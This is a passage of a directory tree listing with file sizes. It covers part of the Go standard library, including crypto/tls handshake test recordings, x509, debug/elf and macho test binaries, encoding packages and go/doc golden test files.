│ │ │ │ ├── [4.8K] generate_cert.go
│ │ │ │ ├── [ 30K] handshake_client.go
│ │ │ │ ├── [ 20K] handshake_client_tls13.go
│ │ │ │ ├── [ 45K] handshake_messages.go
│ │ │ │ ├── [ 24K] handshake_server.go
│ │ │ │ ├── [ 25K] handshake_server_tls13.go
│ │ │ │ ├── [ 12K] key_agreement.go
│ │ │ │ ├── [5.9K] key_schedule.go
│ │ │ │ ├── [8.4K] prf.go
│ │ │ │ ├── [ 12K] testdata
│ │ │ │ │ ├── [ 10K] Client-TLSv10-ClientCert-ECDSA-ECDSA
│ │ │ │ │ ├── [ 10K] Client-TLSv10-ClientCert-ECDSA-RSA
│ │ │ │ │ ├── [8.3K] Client-TLSv10-ClientCert-Ed25519
│ │ │ │ │ ├── [10.0K] Client-TLSv10-ClientCert-RSA-ECDSA
│ │ │ │ │ ├── [ 10K] Client-TLSv10-ClientCert-RSA-RSA
│ │ │ │ │ ├── [6.8K] Client-TLSv10-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [7.1K] Client-TLSv10-ECDHE-RSA-AES
│ │ │ │ │ ├── [ 0] Client-TLSv10-Ed25519
│ │ │ │ │ ├── [7.1K] Client-TLSv10-ExportKeyingMaterial
│ │ │ │ │ ├── [6.2K] Client-TLSv10-RSA-RC4
│ │ │ │ │ ├── [6.9K] Client-TLSv11-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [7.2K] Client-TLSv11-ECDHE-RSA-AES
│ │ │ │ │ ├── [ 0] Client-TLSv11-Ed25519
│ │ │ │ │ ├── [6.2K] Client-TLSv11-RSA-RC4
│ │ │ │ │ ├── [6.4K] Client-TLSv12-AES128-GCM-SHA256
│ │ │ │ │ ├── [7.1K] Client-TLSv12-AES128-SHA256
│ │ │ │ │ ├── [6.4K] Client-TLSv12-AES256-GCM-SHA384
│ │ │ │ │ ├── [6.9K] Client-TLSv12-ALPN
│ │ │ │ │ ├── [6.7K] Client-TLSv12-ALPN-NoMatch
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-ECDSA-ECDSA
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-ECDSA-RSA
│ │ │ │ │ ├── [8.9K] Client-TLSv12-ClientCert-Ed25519
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-RSA-AES256-GCM-SHA384
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-RSA-ECDSA
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-RSA-RSA
│ │ │ │ │ ├── [ 10K] Client-TLSv12-ClientCert-RSA-RSAPKCS1v15
│ │ │ │ │ ├── [ 11K] Client-TLSv12-ClientCert-RSA-RSAPSS
│ │ │ │ │ ├── [6.9K] Client-TLSv12-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [7.2K] Client-TLSv12-ECDHE-ECDSA-AES128-SHA256
│ │ │ │ │ ├── [6.5K] Client-TLSv12-ECDHE-ECDSA-AES256-GCM-SHA384
│ │ │ │ │ ├── [6.5K] Client-TLSv12-ECDHE-ECDSA-AES-GCM
│ │ │ │ │ ├── [6.2K] Client-TLSv12-ECDHE-ECDSA-CHACHA20-POLY1305
│ │ │ │ │ ├── [7.2K] Client-TLSv12-ECDHE-RSA-AES
│ │ │ │ │ ├── [7.5K] Client-TLSv12-ECDHE-RSA-AES128-SHA256
│ │ │ │ │ ├── [6.5K] Client-TLSv12-ECDHE-RSA-CHACHA20-POLY1305
│ │ │ │ │ ├── [5.0K] Client-TLSv12-Ed25519
│ │ │ │ │ ├── [6.7K] Client-TLSv12-ExportKeyingMaterial
│ │ │ │ │ ├── [7.3K] Client-TLSv12-P256-ECDHE
│ │ │ │ │ ├── [ 18K] Client-TLSv12-RenegotiateOnce
│ │ │ │ │ ├── [ 26K] Client-TLSv12-RenegotiateTwice
│ │ │ │ │ ├── [ 18K] Client-TLSv12-RenegotiateTwiceRejected
│ │ │ │ │ ├── [7.0K] Client-TLSv12-RenegotiationRejected
│ │ │ │ │ ├── [6.2K] Client-TLSv12-RSA-RC4
│ │ │ │ │ ├── [8.4K] Client-TLSv12-SCT
│ │ │ │ │ ├── [6.8K] Client-TLSv12-X25519-ECDHE
│ │ │ │ │ ├── [6.8K] Client-TLSv13-AES128-SHA256
│ │ │ │ │ ├── [6.9K] Client-TLSv13-AES256-SHA384
│ │ │ │ │ ├── [7.0K] Client-TLSv13-ALPN
│ │ │ │ │ ├── [6.8K] Client-TLSv13-CHACHA20-SHA256
│ │ │ │ │ ├── [ 11K] Client-TLSv13-ClientCert-ECDSA-RSA
│ │ │ │ │ ├── [9.2K] Client-TLSv13-ClientCert-Ed25519
│ │ │ │ │ ├── [ 10K] Client-TLSv13-ClientCert-RSA-ECDSA
│ │ │ │ │ ├── [ 11K] Client-TLSv13-ClientCert-RSA-RSAPSS
│ │ │ │ │ ├── [6.5K] Client-TLSv13-ECDSA
│ │ │ │ │ ├── [5.1K] Client-TLSv13-Ed25519
│ │ │ │ │ ├── [6.8K] Client-TLSv13-ExportKeyingMaterial
│ │ │ │ │ ├── [8.9K] Client-TLSv13-HelloRetryRequest
│ │ │ │ │ ├── [7.5K] Client-TLSv13-KeyUpdate
│ │ │ │ │ ├── [7.1K] Client-TLSv13-P256-ECDHE
│ │ │ │ │ ├── [6.8K] Client-TLSv13-X25519-ECDHE
│ │ │ │ │ ├── [ 587] example-cert.pem
│ │ │ │ │ ├── [ 227] example-key.pem
│ │ │ │ │ ├── [5.9K] Server-TLSv10-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [7.0K] Server-TLSv10-ExportKeyingMaterial
│ │ │ │ │ ├── [5.6K] Server-TLSv10-RSA-3DES
│ │ │ │ │ ├── [5.9K] Server-TLSv10-RSA-AES
│ │ │ │ │ ├── [5.4K] Server-TLSv10-RSA-RC4
│ │ │ │ │ ├── [ 758] Server-TLSv11-FallbackSCSV
│ │ │ │ │ ├── [5.4K] Server-TLSv11-RSA-RC4
│ │ │ │ │ ├── [6.9K] Server-TLSv12-ALPN
│ │ │ │ │ ├── [6.8K] Server-TLSv12-ALPN-Fallback
│ │ │ │ │ ├── [ 985] Server-TLSv12-ALPN-NoMatch
│ │ │ │ │ ├── [6.8K] Server-TLSv12-ALPN-NotConfigured
│ │ │ │ │ ├── [9.5K] Server-TLSv12-ClientAuthRequestedAndECDSAGiven
│ │ │ │ │ ├── [8.2K] Server-TLSv12-ClientAuthRequestedAndEd25519Given
│ │ │ │ │ ├── [9.4K] Server-TLSv12-ClientAuthRequestedAndGiven
│ │ │ │ │ ├── [9.4K] Server-TLSv12-ClientAuthRequestedAndPKCS1v15Given
│ │ │ │ │ ├── [6.3K] Server-TLSv12-ClientAuthRequestedNotGiven
│ │ │ │ │ ├── [6.3K] Server-TLSv12-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [4.2K] Server-TLSv12-Ed25519
│ │ │ │ │ ├── [6.6K] Server-TLSv12-ExportKeyingMaterial
│ │ │ │ │ ├── [6.8K] Server-TLSv12-IssueTicket
│ │ │ │ │ ├── [6.8K] Server-TLSv12-IssueTicketPreDisable
│ │ │ │ │ ├── [6.4K] Server-TLSv12-P256
│ │ │ │ │ ├── [3.3K] Server-TLSv12-Resume
│ │ │ │ │ ├── [6.8K] Server-TLSv12-ResumeDisabled
│ │ │ │ │ ├── [5.9K] Server-TLSv12-RSA-3DES
│ │ │ │ │ ├── [6.3K] Server-TLSv12-RSA-AES
│ │ │ │ │ ├── [6.1K] Server-TLSv12-RSA-AES256-GCM-SHA384
│ │ │ │ │ ├── [6.1K] Server-TLSv12-RSA-AES-GCM
│ │ │ │ │ ├── [5.6K] Server-TLSv12-RSA-RC4
│ │ │ │ │ ├── [5.7K] Server-TLSv12-RSA-RSAPKCS1v15
│ │ │ │ │ ├── [5.7K] Server-TLSv12-RSA-RSAPSS
│ │ │ │ │ ├── [6.3K] Server-TLSv12-SNI
│ │ │ │ │ ├── [6.3K] Server-TLSv12-SNI-GetCertificate
│ │ │ │ │ ├── [6.3K] Server-TLSv12-SNI-GetCertificateNotFound
│ │ │ │ │ ├── [6.1K] Server-TLSv12-X25519
│ │ │ │ │ ├── [7.5K] Server-TLSv13-AES128-SHA256
│ │ │ │ │ ├── [7.7K] Server-TLSv13-AES256-SHA384
│ │ │ │ │ ├── [7.5K] Server-TLSv13-ALPN
│ │ │ │ │ ├── [7.5K] Server-TLSv13-ALPN-Fallback
│ │ │ │ │ ├── [2.0K] Server-TLSv13-ALPN-NoMatch
│ │ │ │ │ ├── [7.5K] Server-TLSv13-ALPN-NotConfigured
│ │ │ │ │ ├── [7.5K] Server-TLSv13-CHACHA20-SHA256
│ │ │ │ │ ├── [ 14K] Server-TLSv13-ClientAuthRequestedAndECDSAGiven
│ │ │ │ │ ├── [ 11K] Server-TLSv13-ClientAuthRequestedAndEd25519Given
│ │ │ │ │ ├── [ 13K] Server-TLSv13-ClientAuthRequestedAndGiven
│ │ │ │ │ ├── [7.8K] Server-TLSv13-ClientAuthRequestedNotGiven
│ │ │ │ │ ├── [7.2K] Server-TLSv13-ECDHE-ECDSA-AES
│ │ │ │ │ ├── [5.7K] Server-TLSv13-Ed25519
│ │ │ │ │ ├── [7.4K] Server-TLSv13-ExportKeyingMaterial
│ │ │ │ │ ├── [9.2K] Server-TLSv13-HelloRetryRequest
│ │ │ │ │ ├── [7.4K] Server-TLSv13-IssueTicket
│ │ │ │ │ ├── [7.4K] Server-TLSv13-IssueTicketPreDisable
│ │ │ │ │ ├── [7.7K] Server-TLSv13-P256
│ │ │ │ │ ├── [4.4K] Server-TLSv13-Resume
│ │ │ │ │ ├── [7.4K] Server-TLSv13-ResumeDisabled
│ │ │ │ │ ├── [7.1K] Server-TLSv13-Resume-HelloRetryRequest
│ │ │ │ │ ├── [7.3K] Server-TLSv13-RSA-RSAPSS
│ │ │ │ │ ├── [1.0K] Server-TLSv13-RSA-RSAPSS-TooSmall
│ │ │ │ │ └── [7.3K] Server-TLSv13-X25519
│ │ │ │ ├── [5.2K] ticket.go
│ │ │ │ └── [ 12K] tls.go
│ │ │ └── [4.0K] x509
│ │ │ ├── [7.7K] cert_pool.go
│ │ │ ├── [4.0K] internal
│ │ │ │ └── [4.0K] macos
│ │ │ │ ├── [8.1K] corefoundation.go
│ │ │ │ ├── [1.6K] corefoundation.s
│ │ │ │ ├── [9.0K] security.go
│ │ │ │ └── [1.6K] security.s
│ │ │ ├── [ 35K] parser.go
│ │ │ ├── [7.2K] pem_decrypt.go
│ │ │ ├── [4.7K] pkcs1.go
│ │ │ ├── [4.3K] pkcs8.go
│ │ │ ├── [4.0K] pkix
│ │ │ │ └── [9.1K] pkix.go
│ │ │ ├── [ 410] root_aix.go
│ │ │ ├── [ 748] root_bsd.go
│ │ │ ├── [3.0K] root_darwin.go
│ │ │ ├── [ 796] root.go
│ │ │ ├── [ 379] root_js.go
│ │ │ ├── [ 959] root_linux.go
│ │ │ ├── [ 828] root_plan9.go
│ │ │ ├── [ 538] root_solaris.go
│ │ │ ├── [2.7K] root_unix.go
│ │ │ ├── [8.9K] root_windows.go
│ │ │ ├── [4.1K] sec1.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ └── [1.9K] test-dir.crt
│ │ │ ├── [1.9K] test-file.crt
│ │ │ ├── [ 34K] verify.go
│ │ │ ├── [ 73K] x509.go
│ │ │ └── [1.7K] x509_test_import.go
│ │ ├── [4.0K] database
│ │ │ └── [4.0K] sql
│ │ │ ├── [ 16K] convert.go
│ │ │ ├── [3.5K] ctxutil.go
│ │ │ ├── [2.1K] doc.txt
│ │ │ ├── [4.0K] driver
│ │ │ │ ├── [ 20K] driver.go
│ │ │ │ └── [8.5K] types.go
│ │ │ └── [ 96K] sql.go
│ │ ├── [4.0K] debug
│ │ │ ├── [4.0K] buildinfo
│ │ │ │ └── [ 11K] buildinfo.go
│ │ │ ├── [4.0K] dwarf
│ │ │ │ ├── [7.9K] attr_string.go
│ │ │ │ ├── [3.7K] buf.go
│ │ │ │ ├── [1.1K] class_string.go
│ │ │ │ ├── [ 14K] const.go
│ │ │ │ ├── [ 30K] entry.go
│ │ │ │ ├── [ 23K] line.go
│ │ │ │ ├── [3.8K] open.go
│ │ │ │ ├── [3.9K] tag_string.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 381] bitfields.c
│ │ │ │ │ ├── [2.4K] bitfields.elf4
│ │ │ │ │ ├── [ 667] cppunsuptypes.cc
│ │ │ │ │ ├── [3.8K] cppunsuptypes.elf
│ │ │ │ │ ├── [ 103] cycle.c
│ │ │ │ │ ├── [2.6K] cycle.elf
│ │ │ │ │ ├── [ 23] debug_rnglists
│ │ │ │ │ ├── [ 61] line1.c
│ │ │ │ │ ├── [ 83] line1.h
│ │ │ │ │ ├── [ 54] line2.c
│ │ │ │ │ ├── [ 18K] line-clang-dwarf5.elf
│ │ │ │ │ ├── [ 10K] line-clang.elf
│ │ │ │ │ ├── [ 18K] line-gcc-dwarf5.elf
│ │ │ │ │ ├── [9.9K] line-gcc.elf
│ │ │ │ │ ├── [130K] line-gcc-win.bin
│ │ │ │ │ ├── [ 415] ranges.c
│ │ │ │ │ ├── [ 10K] ranges.elf
│ │ │ │ │ ├── [ 268] rnglistx.c
│ │ │ │ │ ├── [ 11K] rnglistx.elf
│ │ │ │ │ ├── [ 59] split.c
│ │ │ │ │ ├── [9.3K] split.elf
│ │ │ │ │ ├── [2.1K] typedef.c
│ │ │ │ │ ├── [ 12K] typedef.elf
│ │ │ │ │ ├── [9.3K] typedef.elf4
│ │ │ │ │ ├── [5.9K] typedef.elf5
│ │ │ │ │ ├── [4.9K] typedef.macho
│ │ │ │ │ └── [6.1K] typedef.macho4
│ │ │ │ ├── [ 22K] type.go
│ │ │ │ ├── [3.6K] typeunit.go
│ │ │ │ └── [2.7K] unit.go
│ │ │ ├── [4.0K] elf
│ │ │ │ ├── [122K] elf.go
│ │ │ │ ├── [ 37K] file.go
│ │ │ │ ├── [2.1K] reader.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [2.2K] compressed-32.obj
│ │ │ │ ├── [3.2K] compressed-64.obj
│ │ │ │ ├── [5.6K] gcc-386-freebsd-exec
│ │ │ │ ├── [8.6K] gcc-amd64-linux-exec
│ │ │ │ ├── [6.4K] gcc-amd64-openbsd-debug-with-rela.obj
│ │ │ │ ├── [3.0K] go-relocation-test-clang-arm.obj
│ │ │ │ ├── [1.9K] go-relocation-test-clang-x86.obj
│ │ │ │ ├── [3.0K] go-relocation-test-gcc424-x86-64.obj
│ │ │ │ ├── [2.9K] go-relocation-test-gcc441-x86-64.obj
│ │ │ │ ├── [1.8K] go-relocation-test-gcc441-x86.obj
│ │ │ │ ├── [3.3K] go-relocation-test-gcc482-aarch64.obj
│ │ │ │ ├── [2.9K] go-relocation-test-gcc482-ppc64le.obj
│ │ │ │ ├── [2.6K] go-relocation-test-gcc492-arm.obj
│ │ │ │ ├── [4.0K] go-relocation-test-gcc492-mips64.obj
│ │ │ │ ├── [2.8K] go-relocation-test-gcc492-mipsle.obj
│ │ │ │ ├── [4.1K] go-relocation-test-gcc493-mips64le.obj
│ │ │ │ ├── [3.8K] go-relocation-test-gcc531-s390x.obj
│ │ │ │ ├── [3.0K] go-relocation-test-gcc540-mips.obj
│ │ │ │ ├── [2.3K] go-relocation-test-gcc5-ppc.obj
│ │ │ │ ├── [5.8K] go-relocation-test-gcc620-sparc64.obj
│ │ │ │ ├── [9.4K] go-relocation-test-gcc720-riscv64.obj
│ │ │ │ ├── [5.6K] go-relocation-test-gcc930-ranges-no-rela-x86-64
│ │ │ │ ├── [7.5K] go-relocation-test-gcc930-ranges-with-rela-x86-64
│ │ │ │ ├── [ 85] hello.c
│ │ │ │ ├── [ 12K] hello-world-core.gz
│ │ │ │ ├── [1.1K] multiple-code-sections.c
│ │ │ │ └── [3.1K] zdebug-test-gcc484-x86-64.obj
│ │ │ ├── [4.0K] gosym
│ │ │ │ ├── [ 18K] pclntab.go
│ │ │ │ ├── [ 18K] symtab.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 130] main.go
│ │ │ │ ├── [ 74] pclinetest.h
│ │ │ │ ├── [10.0K] pclinetest.s
│ │ │ │ └── [122K] pcln115.gz
│ │ │ ├── [4.0K] macho
│ │ │ │ ├── [3.9K] fat.go
│ │ │ │ ├── [ 17K] file.go
│ │ │ │ ├── [7.6K] macho.go
│ │ │ │ ├── [2.4K] reloctype.go
│ │ │ │ ├── [2.4K] reloctype_string.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 11K] clang-386-darwin-exec-with-rpath.base64
│ │ │ │ ├── [ 621] clang-386-darwin.obj.base64
│ │ │ │ ├── [ 11K] clang-amd64-darwin-exec-with-rpath.base64
│ │ │ │ ├── [1.0K] clang-amd64-darwin.obj.base64
│ │ │ │ ├── [ 38K] fat-gcc-386-amd64-darwin-exec.base64
│ │ │ │ ├── [ 16K] gcc-386-darwin-exec.base64
│ │ │ │ ├── [ 11K] gcc-amd64-darwin-exec.base64
│ │ │ │ ├── [5.9K] gcc-amd64-darwin-exec-debug.base64
│ │ │ │ ├── [ 11K] gcc-amd64-darwin-exec-with-bad-dysym.base64
│ │ │ │ └── [ 77] hello.c
│ │ │ ├── [4.0K] pe
│ │ │ │ ├── [ 17K] file.go
│ │ │ │ ├── [6.4K] pe.go
│ │ │ │ ├── [3.3K] section.go
│ │ │ │ ├── [2.2K] string.go
│ │ │ │ ├── [4.8K] symbol.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 29K] gcc-386-mingw-exec
│ │ │ │ ├── [8.5K] gcc-386-mingw-no-symbols-exec
│ │ │ │ ├── [2.3K] gcc-386-mingw-obj
│ │ │ │ ├── [267K] gcc-amd64-mingw-exec
│ │ │ │ ├── [ 736] gcc-amd64-mingw-obj
│ │ │ │ ├── [ 77] hello.c
│ │ │ │ ├── [ 23K] llvm-mingw-20211002-msvcrt-x86_64-crt2
│ │ │ │ └── [ 474] vmlinuz-4.15.0-47-generic
│ │ │ └── [4.0K] plan9obj
│ │ │ ├── [6.8K] file.go
│ │ │ ├── [ 863] plan9obj.go
│ │ │ └── [4.0K] testdata
│ │ │ ├── [ 36K] 386-plan9-exec
│ │ │ ├── [ 33K] amd64-plan9-exec
│ │ │ └── [ 80] hello.c
│ │ ├── [4.0K] embed
│ │ │ ├── [ 13K] embed.go
│ │ │ └── [4.0K] internal
│ │ │ └── [4.0K] embedtest
│ │ │ ├── [ 32] concurrency.txt
│ │ │ └── [4.0K] testdata
│ │ │ ├── [2.0K] ascii.txt
│ │ │ ├── [ 40] glass.txt
│ │ │ ├── [ 13] hello.txt
│ │ │ ├── [4.0K] _hidden
│ │ │ │ └── [ 61] fortune.txt
│ │ │ ├── [4.0K] i
│ │ │ │ ├── [ 21] i18n.txt
│ │ │ │ └── [4.0K] j
│ │ │ │ └── [4.0K] k
│ │ │ │ └── [ 11] k8s.txt
│ │ │ ├── [ 47] ken.txt
│ │ │ └── [4.0K] -not-hidden
│ │ │ └── [ 61] fortune.txt
│ │ ├── [4.0K] encoding
│ │ │ ├── [4.0K] ascii85
│ │ │ │ └── [6.8K] ascii85.go
│ │ │ ├── [4.0K] asn1
│ │ │ │ ├── [ 32K] asn1.go
│ │ │ │ ├── [5.5K] common.go
│ │ │ │ └── [ 17K] marshal.go
│ │ │ ├── [4.0K] base32
│ │ │ │ └── [ 13K] base32.go
│ │ │ ├── [4.0K] base64
│ │ │ │ └── [ 15K] base64.go
│ │ │ ├── [4.0K] binary
│ │ │ │ ├── [ 19K] binary.go
│ │ │ │ └── [4.4K] varint.go
│ │ │ ├── [4.0K] csv
│ │ │ │ ├── [1.3K] fuzz.go
│ │ │ │ ├── [ 14K] reader.go
│ │ │ │ └── [4.7K] writer.go
│ │ │ ├── [1.9K] encoding.go
│ │ │ ├── [4.0K] gob
│ │ │ │ ├── [ 18K] debug.go
│ │ │ │ ├── [4.8K] decgen.go
│ │ │ │ ├── [ 13K] dec_helpers.go
│ │ │ │ ├── [ 39K] decode.go
│ │ │ │ ├── [7.1K] decoder.go
│ │ │ │ ├── [ 17K] doc.go
│ │ │ │ ├── [ 558] dump.go
│ │ │ │ ├── [3.7K] encgen.go
│ │ │ │ ├── [9.9K] enc_helpers.go
│ │ │ │ ├── [ 20K] encode.go
│ │ │ │ ├── [7.8K] encoder.go
│ │ │ │ ├── [1.3K] error.go
│ │ │ │ └── [ 27K] type.go
│ │ │ ├── [4.0K] hex
│ │ │ │ └── [9.0K] hex.go
│ │ │ ├── [4.0K] json
│ │ │ │ ├── [ 35K] decode.go
│ │ │ │ ├── [ 38K] encode.go
│ │ │ │ ├── [3.4K] fold.go
│ │ │ │ ├── [ 725] fuzz.go
│ │ │ │ ├── [3.4K] indent.go
│ │ │ │ ├── [ 16K] scanner.go
│ │ │ │ ├── [ 13K] stream.go
│ │ │ │ ├── [4.2K] tables.go
│ │ │ │ ├── [ 972] tags.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [118K] code.json.gz
│ │ │ ├── [4.0K] pem
│ │ │ │ └── [7.6K] pem.go
│ │ │ └── [4.0K] xml
│ │ │ ├── [ 29K] marshal.go
│ │ │ ├── [ 22K] read.go
│ │ │ ├── [9.6K] typeinfo.go
│ │ │ └── [ 47K] xml.go
│ │ ├── [4.0K] errors
│ │ │ ├── [2.0K] errors.go
│ │ │ └── [3.3K] wrap.go
│ │ ├── [4.0K] expvar
│ │ │ └── [7.9K] expvar.go
│ │ ├── [4.0K] flag
│ │ │ └── [ 38K] flag.go
│ │ ├── [4.0K] fmt
│ │ │ ├── [ 15K] doc.go
│ │ │ ├── [1.0K] errors.go
│ │ │ ├── [ 13K] format.go
│ │ │ ├── [ 30K] print.go
│ │ │ └── [ 32K] scan.go
│ │ ├── [4.0K] go
│ │ │ ├── [4.0K] ast
│ │ │ │ ├── [ 34K] ast.go
│ │ │ │ ├── [8.9K] commentmap.go
│ │ │ │ ├── [ 13K] filter.go
│ │ │ │ ├── [5.7K] import.go
│ │ │ │ ├── [5.8K] print.go
│ │ │ │ ├── [5.2K] resolve.go
│ │ │ │ ├── [3.9K] scope.go
│ │ │ │ └── [6.4K] walk.go
│ │ │ ├── [4.0K] build
│ │ │ │ ├── [ 60K] build.go
│ │ │ │ ├── [4.0K] constraint
│ │ │ │ │ └── [ 14K] expr.go
│ │ │ │ ├── [3.7K] doc.go
│ │ │ │ ├── [ 344] gccgo.go
│ │ │ │ ├── [ 396] gc.go
│ │ │ │ ├── [ 13K] read.go
│ │ │ │ ├── [1.8K] syslist.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] alltags
│ │ │ │ │ ├── [ 176] alltags.go
│ │ │ │ │ └── [ 176] x_netbsd_arm.go
│ │ │ │ ├── [4.0K] cgo_disabled
│ │ │ │ │ ├── [ 63] cgo_disabled.go
│ │ │ │ │ └── [ 21] empty.go
│ │ │ │ ├── [4.0K] doc
│ │ │ │ │ ├── [ 12] e.go
│ │ │ │ │ └── [ 23] f.go
│ │ │ │ ├── [4.0K] empty
│ │ │ │ │ └── [ 0] dummy
│ │ │ │ ├── [4.0K] multi
│ │ │ │ │ ├── [ 67] file_appengine.go
│ │ │ │ │ └── [ 59] file.go
│ │ │ │ ├── [4.0K] other
│ │ │ │ │ ├── [4.0K] file
│ │ │ │ │ │ └── [ 56] file.go
│ │ │ │ │ └── [ 92] main.go
│ │ │ │ └── [4.0K] withvendor
│ │ │ │ └── [4.0K] src
│ │ │ │ └── [4.0K] a
│ │ │ │ ├── [4.0K] b
│ │ │ │ │ └── [ 26] b.go
│ │ │ │ └── [4.0K] vendor
│ │ │ │ └── [4.0K] c
│ │ │ │ └── [4.0K] d
│ │ │ │ └── [ 10] d.go
│ │ │ ├── [4.0K] constant
│ │ │ │ ├── [ 676] kind_string.go
│ │ │ │ └── [ 34K] value.go
│ │ │ ├── [4.0K] doc
│ │ │ │ ├── [4.0K] comment
│ │ │ │ │ ├── [3.5K] html.go
│ │ │ │ │ ├── [4.4K] markdown.go
│ │ │ │ │ ├── [ 768] mkstd.sh
│ │ │ │ │ ├── [ 31K] parse.go
│ │ │ │ │ ├── [7.6K] print.go
│ │ │ │ │ ├── [ 611] std.go
│ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ ├── [ 216] blank.txt
│ │ │ │ │ │ ├── [ 423] code2.txt
│ │ │ │ │ │ ├── [ 437] code3.txt
│ │ │ │ │ │ ├── [ 944] code.txt
│ │ │ │ │ │ ├── [ 268] doclink2.txt
│ │ │ │ │ │ ├── [ 180] doclink3.txt
│ │ │ │ │ │ ├── [ 235] doclink4.txt
│ │ │ │ │ │ ├── [ 188] doclink5.txt
│ │ │ │ │ │ ├── [ 303] doclink6.txt
│ │ │ │ │ │ ├── [ 158] doclink7.txt
│ │ │ │ │ │ ├── [1.1K] doclink.txt
│ │ │ │ │ │ ├── [ 535] escape.txt
│ │ │ │ │ │ ├── [ 232] head2.txt
│ │ │ │ │ │ ├── [ 131] head3.txt
│ │ │ │ │ │ ├── [1.2K] head.txt
│ │ │ │ │ │ ├── [ 326] hello.txt
│ │ │ │ │ │ ├── [ 997] link2.txt
│ │ │ │ │ │ ├── [ 178] link3.txt
│ │ │ │ │ │ ├── [1020] link4.txt
│ │ │ │ │ │ ├── [ 772] link5.txt
│ │ │ │ │ │ ├── [2.2K] link6.txt
│ │ │ │ │ │ ├── [ 568] link7.txt
│ │ │ │ │ │ ├── [ 527] link.txt
│ │ │ │ │ │ ├── [ 529] list2.txt
│ │ │ │ │ │ ├── [ 268] list3.txt
│ │ │ │ │ │ ├── [ 421] list4.txt
│ │ │ │ │ │ ├── [ 590] list5.txt
│ │ │ │ │ │ ├── [2.0K] list6.txt
│ │ │ │ │ │ ├── [ 565] list7.txt
│ │ │ │ │ │ ├── [ 335] list8.txt
│ │ │ │ │ │ ├── [ 776] list.txt
│ │ │ │ │ │ ├── [ 243] para.txt
│ │ │ │ │ │ ├── [ 476] quote.txt
│ │ │ │ │ │ ├── [1.3K] README.md
│ │ │ │ │ │ ├── [ 937] text2.txt
│ │ │ │ │ │ ├── [ 937] text3.txt
│ │ │ │ │ │ ├── [ 937] text4.txt
│ │ │ │ │ │ ├── [ 937] text5.txt
│ │ │ │ │ │ ├── [ 919] text6.txt
│ │ │ │ │ │ ├── [1.1K] text7.txt
│ │ │ │ │ │ ├── [3.5K] text8.txt
│ │ │ │ │ │ ├── [ 174] text9.txt
│ │ │ │ │ │ ├── [ 521] text.txt
│ │ │ │ │ │ └── [ 426] words.txt
│ │ │ │ │ └── [8.8K] text.go
│ │ │ │ ├── [1.9K] comment.go
│ │ │ │ ├── [ 11K] doc.go
│ │ │ │ ├── [ 16K] example.go
│ │ │ │ ├── [8.5K] exports.go
│ │ │ │ ├── [2.2K] filter.go
│ │ │ │ ├── [2.5K] headscan.go
│ │ │ │ ├── [ 246] Makefile
│ │ │ │ ├── [ 28K] reader.go
│ │ │ │ ├── [2.2K] synopsis.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [1.1K] a0.go
│ │ │ │ ├── [ 688] a.0.golden
│ │ │ │ ├── [ 240] a1.go
│ │ │ │ ├── [ 688] a.1.golden
│ │ │ │ ├── [ 688] a.2.golden
│ │ │ │ ├── [ 766] b.0.golden
│ │ │ │ ├── [1.1K] b.1.golden
│ │ │ │ ├── [ 766] b.2.golden
│ │ │ │ ├── [7.4K] benchmark.go
│ │ │ │ ├── [1.5K] b.go
│ │ │ │ ├── [ 751] blank.0.golden
│ │ │ │ ├── [1001] blank.1.golden
│ │ │ │ ├── [ 751] blank.2.golden
│ │ │ │ ├── [1.1K] blank.go
│ │ │ │ ├── [ 275] bugpara.0.golden
│ │ │ │ ├── [ 275] bugpara.1.golden
│ │ │ │ ├── [ 275] bugpara.2.golden
│ │ │ │ ├── [ 252] bugpara.go
│ │ │ │ ├── [ 620] c.0.golden
│ │ │ │ ├── [ 620] c.1.golden
│ │ │ │ ├── [ 620] c.2.golden
│ │ │ │ ├── [1.2K] c.go
│ │ │ │ ├── [1.5K] d.0.golden
│ │ │ │ ├── [1.0K] d1.go
│ │ │ │ ├── [1.5K] d.1.golden
│ │ │ │ ├── [ 789] d2.go
│ │ │ │ ├── [1.5K] d.2.golden
│ │ │ │ ├── [1.5K] e.0.golden
│ │ │ │ ├── [1.8K] e.1.golden
│ │ │ │ ├── [2.1K] e.2.golden
│ │ │ │ ├── [2.8K] e.go
│ │ │ │ ├── [ 390] error1.0.golden
│ │ │ │ ├── [ 440] error1.1.golden
│ │ │ │ ├── [ 390] error1.2.golden
│ │ │ │ ├── [ 498] error1.go
│ │ │ │ ├── [ 337] error2.0.golden
│ │ │ │ ├── [ 565] error2.1.golden
│ │ │ │ ├── [ 337] error2.2.golden
│ │ │ │ ├── [ 618] error2.go
│ │ │ │ ├── [1.6K] example.go
│ │ │ │ ├── [ 215] f.0.golden
│ │ │ │ ├── [ 240] f.1.golden
│ │ │ │ ├── [ 215] f.2.golden
│ │ │ │ ├── [ 486] f.go
│ │ │ │ ├── [ 318] g.0.golden
│ │ │ │ ├── [ 388] g.1.golden
│ │ │ │ ├── [ 318] g.2.golden
│ │ │ │ ├── [1.8K] generics.0.golden
│ │ │ │ ├── [1.6K] generics.1.golden
│ │ │ │ ├── [1.8K] generics.2.golden
│ │ │ │ ├── [2.1K] generics.go
│ │ │ │ ├── [ 449] g.go
│ │ │ │ ├── [ 928] issue12839.0.golden
│ │ │ │ ├── [ 962] issue12839.1.golden
│ │ │ │ ├── [ 928] issue12839.2.golden
│ │ │ │ ├── [1.3K] issue12839.go
